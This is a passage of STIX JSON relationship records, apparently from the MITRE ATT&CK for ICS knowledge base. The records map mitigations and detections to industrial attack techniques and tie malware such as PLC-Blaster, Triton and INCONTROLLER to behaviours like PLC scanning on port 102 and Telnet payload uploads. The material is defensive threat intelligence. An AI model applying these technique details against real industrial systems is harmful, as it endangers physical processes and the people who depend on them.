2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:12.380Z", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. 
(Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fc9fbfc-ab9f-4189-bc1f-d473e9ef36b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ee2fdebd-1587-4e53-a7d7-c15fcc88879d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 
2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:35:50.632Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) utilizes valid user and administrator credentials, in addition to creating new administrator accounts to maintain presence. (Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c0bdf4c-233f-42cd-8900-2a5cc8c9387c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:18.283Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) scans the network to find other Siemens S7 PLC devices to infect. It locates these devices by checking for a service listening on TCP port 102. 
(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ef615d62-fe85-4740-9c5d-5dddff9b5693", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec Security Response July 2014", + "description": "Symantec Security Response 2014, July 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Retrieved. 2016/04/08 ", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers#:~:text=The%20attackers%2C%20known%20to%20Symantec,supply%20in%20the%20affected%20countries." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:12:48.097Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) trojanized legitimate ICS equipment providers software packages available for download on their websites.(Citation: Symantec Security Response July 2014)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:08.649Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized credentials collected through phishing and watering hole attacks. 
(Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce0d3a3a-9c62-4bfb-a47a-7b1b23e9f035", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:12:25.664Z", + "description": "Monitor for third-party application logging, messaging, and/or other artifacts that may leverage information repositories to mine valuable information. Information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. 
In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f86bde61-c4ec-4d40-9768-32e9b52c1702", + "created": "2023-03-22T15:52:30.607Z", + "revoked": false, + "external_references": [ + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:52:30.607Z", + "description": "Devices and programs should validate the content of any remote parameter changes, including those from HMIs, control servers, or engineering workstations.(Citation: PLCTop20 Mar 2023)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--63323b12-86db-4b91-a701-90daf3f98f7c", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.122Z", + "relationship_type": "mitigates", + "description": "Segment networks and systems appropriately to reduce access to critical system and services communications.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--00b98fa6-4913-40a4-8920-befed8621c41", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:15:33.180Z", + "description": "Monitor ICS asset application logs that indicate alarm settings have changed, although not all assets will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0df0cb6d-0067-48b2-a33e-495415713ab7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.181Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + 
"source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b72b7dfd-f134-4324-84b8-52ff13fc6b5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fcecf74-36df-41ab-9476-539c9ac0b339", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.179Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management 
systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2cd79563-0f5a-44a1-9be4-6dc330855d64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.150Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c9395e2a-afaf-427c-bcb2-ae663d72c05c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.068Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for alarms to be reported in the event of a communication failure.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:38:23.604Z", + "description": "Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86d45e92-80ba-4f97-b3a3-03ad3469658b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Junnosuke Yagi March 2017", + "description": "Junnosuke Yagi 2017, March 07 Trojan.Stonedrill Retrieved. 
2019/12/05 ", + "url": "https://www.symantec.com/security-center/writeup/2017-030708-4403-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:15.111Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilize backdoors capable of capturing screenshots once installed on a system. (Citation: Jacqueline O'Leary et al. September 2017)(Citation: Junnosuke Yagi March 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56dcc2d7-5243-4a5d-a556-8723642e98a4", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:51.471Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) would reset the controller to the previous state over TriStation and if this failed it would write a dummy program to memory in what was likely an attempt at anti-forensics. 
(Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--37abb3d5-24fc-4397-844e-07548d324729", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:32:20.552Z", + "description": "Monitor for anomalous or unexpected commands that may result in changes to the process operation (e.g., discrete write, logic and device configuration, mode changes) observable via asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97538255-b049-4d15-91c4-6b227cbea476", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:16:09.542Z", + "description": "Data about the industrial process may indicate it is operating outside of expected bounds and could help indicate that that an alarm setting has changed. 
This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fdaa9be-aecf-459f-b028-7c35dc8b6451", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.152Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only designated administrators or engineers can interact with alarm management and alarm configuration thresholds.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c5dd0d66-99f1-4efd-b0f9-bf9f9118ff16", + "type": "relationship", + "created": "2020-06-10T18:36:54.638Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NCSC Sandworm Feb 2020", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020." 
+ }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020." + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020." + }, + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + }, + { + "source_name": "Trend Micro Cyclops Blink March 2022", + "url": "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", + "description": "Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022." 
+ } + ], + "modified": "2022-03-17T15:07:01.055Z", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: Trend Micro Cyclops Blink March 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2867f491-919b-463f-b689-bb3ceb7ae99f", + "created": "2022-09-28T20:31:07.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. 
Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.434Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to remotely connect to Schneider PLCs and perform maintenance functions on the device.(Citation: Wylie-22)\n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can use Telnet to upload payloads and execute commands on Omron PLCs.\t(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream) The malware can also use HTTP-based CGI scripts (e.g., cpu.fcgi, ecat.fcgi) to gain administrative access to the device.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fffbea8-c031-4de8-a451-447bbbe3e224", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Consider the use of application isolation and sandboxing to restrict specific operating system interactions such as access through user accounts, services, system calls, registry, and network access. 
